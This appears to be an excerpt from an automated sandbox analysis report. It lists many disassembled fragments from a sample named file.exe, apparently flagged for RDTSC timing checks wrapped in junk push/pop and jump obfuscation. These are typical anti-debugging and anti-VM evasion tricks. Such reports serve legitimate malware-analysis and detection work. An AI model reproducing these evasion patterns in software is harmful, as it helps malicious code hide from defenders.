                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF4AE1 second address: CF4AE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF4AE5 second address: CF4AFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FB97CFF015Fh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF4C2F second address: CF4C51 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB97CFE9228h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF4ED9 second address: CF4F2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB97CFF0165h 0x00000009 popad 0x0000000a jnp 00007FB97CFF016Fh 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FB97CFF0169h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF4F2E second address: CF4F48 instructions: 0x00000000 rdtsc 0x00000002 je 00007FB97CFE9216h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB97CFE921Eh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF4F48 second address: CF4F56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007FB97CFF0156h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF5259 second address: CF5275 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jmp 00007FB97CFE921Dh 0x0000000b pushad 0x0000000c popad 0x0000000d jno 00007FB97CFE9216h 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF5275 second address: CF5291 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB97CFF0166h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF56B2 second address: CF56BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF56BB second address: CF56BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF56BF second address: CF56ED instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jnp 00007FB97CFE9216h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FB97CFE9221h 0x00000011 popad 0x00000012 pushad 0x00000013 jbe 00007FB97CFE921Ch 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF3F7B second address: CF3F7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C67F97 second address: C67F9C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFB39F second address: CFB3E0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jnp 00007FB97CFF0156h 0x00000009 push eax 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c jo 00007FB97CFF0158h 0x00000012 pushad 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push esi 0x00000017 jmp 00007FB97CFF0168h 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FB97CFF0160h 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFB82A second address: CFB856 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB97CFE9223h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007FB97CFE921Ah 0x0000000f push edi 0x00000010 pop edi 0x00000011 push edx 0x00000012 pop edx 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 ja 00007FB97CFE9226h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFB856 second address: CFB864 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB97CFF015Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFB864 second address: CFB86C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFB86C second address: CFB870 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFBB7F second address: CFBB92 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB97CFE9216h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jp 00007FB97CFE9216h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFBD26 second address: CFBD2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFBEB4 second address: CFBEB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFC1DD second address: CFC1E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFC1E3 second address: CFC1E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFC1E9 second address: CFC1FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007FB97CFF015Ah 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D00BC3 second address: D00BD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FB97CFE9216h 0x0000000a pop ebx 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C699A8 second address: C699B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FB97CFF0156h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBE3F6 second address: CBE42B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 jbe 00007FB97CFE9216h 0x0000000c pop ebx 0x0000000d popad 0x0000000e mov dword ptr [esp], eax 0x00000011 push edi 0x00000012 pushad 0x00000013 and di, AE8Ah 0x00000018 mov edx, dword ptr [ebp+122D2846h] 0x0000001e popad 0x0000001f pop edx 0x00000020 lea eax, dword ptr [ebp+124901A2h] 0x00000026 mov dx, 6199h 0x0000002a push eax 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f jg 00007FB97CFE9216h 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBE42B second address: CBE431 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBE431 second address: CBE437 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBE437 second address: C98473 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007FB97CFF0158h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 0000001Ch 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 pushad 0x00000026 mov ebx, edi 0x00000028 mov si, di 0x0000002b popad 0x0000002c call dword ptr [ebp+122D26B1h] 0x00000032 push eax 0x00000033 push edx 0x00000034 push edi 0x00000035 jo 00007FB97CFF0156h 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBE62B second address: CBE631 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBE631 second address: CBE636 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBE636 second address: CBE64A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d jnl 00007FB97CFE9216h 0x00000013 pop edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBEA21 second address: CBEA2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FB97CFF0156h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBEA2B second address: CBEA3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBEA3A second address: CBEA40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBEB28 second address: CBEB2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBEB2C second address: CBEB32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBEE17 second address: CBEE1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBEE1B second address: CBEE22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBEE22 second address: CBEE44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB97CFE9227h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBF6A0 second address: CBF6A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBF6A8 second address: CBF6D1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jl 00007FB97CFE9224h 0x0000000e jmp 00007FB97CFE921Eh 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 pushad 0x00000018 jbe 00007FB97CFE921Ch 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBF6D1 second address: CBF71B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007FB97CFF0160h 0x0000000c popad 0x0000000d popad 0x0000000e mov eax, dword ptr [eax] 0x00000010 push esi 0x00000011 jmp 00007FB97CFF0164h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push esi 0x0000001e jmp 00007FB97CFF0161h 0x00000023 pop esi 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBF7A0 second address: CBF82F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov edi, dword ptr [ebp+122D2690h] 0x00000011 lea eax, dword ptr [ebp+124901E6h] 0x00000017 jmp 00007FB97CFE9220h 0x0000001c nop 0x0000001d pushad 0x0000001e jo 00007FB97CFE921Ch 0x00000024 jl 00007FB97CFE9216h 0x0000002a push edx 0x0000002b jmp 00007FB97CFE9220h 0x00000030 pop edx 0x00000031 popad 0x00000032 push eax 0x00000033 push esi 0x00000034 jp 00007FB97CFE921Ch 0x0000003a jbe 00007FB97CFE9216h 0x00000040 pop esi 0x00000041 nop 0x00000042 sub ch, 00000071h 0x00000045 lea eax, dword ptr [ebp+124901A2h] 0x0000004b push 00000000h 0x0000004d push edi 0x0000004e call 00007FB97CFE9218h 0x00000053 pop edi 0x00000054 mov dword ptr [esp+04h], edi 0x00000058 add dword ptr [esp+04h], 00000016h 0x00000060 inc edi 0x00000061 push edi 0x00000062 ret 0x00000063 pop edi 0x00000064 ret 0x00000065 sub edx, 0C29EA6Dh 0x0000006b nop 0x0000006c jnc 00007FB97CFE9220h 0x00000072 pushad 0x00000073 push eax 0x00000074 push edx 0x00000075 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBF82F second address: CBF841 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007FB97CFF0158h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFFECB second address: CFFED1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFFED1 second address: CFFEDD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007FB97CFF0156h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFFEDD second address: CFFEEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FB97CFE921Bh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFFEEE second address: CFFF21 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FB97CFF015Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push edi 0x00000014 pop edi 0x00000015 popad 0x00000016 pushad 0x00000017 jmp 00007FB97CFF015Ah 0x0000001c jmp 00007FB97CFF015Bh 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFFF21 second address: CFFF29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D001BF second address: D001E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB97CFF0166h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D001E0 second address: D001E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D001E4 second address: D001FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB97CFF0167h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0063E second address: D0064D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 push ecx 0x00000007 jl 00007FB97CFE921Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0078A second address: D007A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 jmp 00007FB97CFF015Eh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D007A1 second address: D007A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D02BE1 second address: D02BE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D02BE7 second address: D02BEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D02BEC second address: D02C0A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB97CFF0160h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007FB97CFF0173h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0485E second address: D04862 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D04862 second address: D04871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FB97CFF0156h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D04871 second address: D04876 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D04876 second address: D0487C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0487C second address: D04880 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D04880 second address: D048A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007FB97CFF0156h 0x0000000e jmp 00007FB97CFF0168h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D048A6 second address: D048B8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jno 00007FB97CFE9216h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C707A9 second address: C707B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C707B4 second address: C707B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C707B8 second address: C707BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C707BC second address: C707D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jp 00007FB97CFE921Ch 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C707D0 second address: C707FF instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB97CFF015Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FB97CFF015Ch 0x0000000f jmp 00007FB97CFF0161h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D07999 second address: D079A6 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB97CFE9216h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D079A6 second address: D079B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FB97CFF0156h 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D079B5 second address: D079B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D079B9 second address: D079E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jo 00007FB97CFF0156h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007FB97CFF0163h 0x00000013 jbe 00007FB97CFF0167h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D071C9 second address: D071CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D071CD second address: D071D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D071D1 second address: D071D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D071D7 second address: D071DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D071DD second address: D071EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB97CFE921Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D071EE second address: D07231 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB97CFF0156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jno 00007FB97CFF017Dh 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push edx 0x00000014 ja 00007FB97CFF0156h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D07231 second address: D0723E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007FB97CFE9216h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0723E second address: D0725B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB97CFF015Fh 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d js 00007FB97CFF0156h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D073EF second address: D073F4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D073F4 second address: D0740E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB97CFF015Bh 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007FB97CFF0156h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D090A8 second address: D090BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push edi 0x00000008 jne 00007FB97CFE9216h 0x0000000e pop edi 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D090BC second address: D090C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FB97CFF0156h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D090C6 second address: D090CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D104FD second address: D10501 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
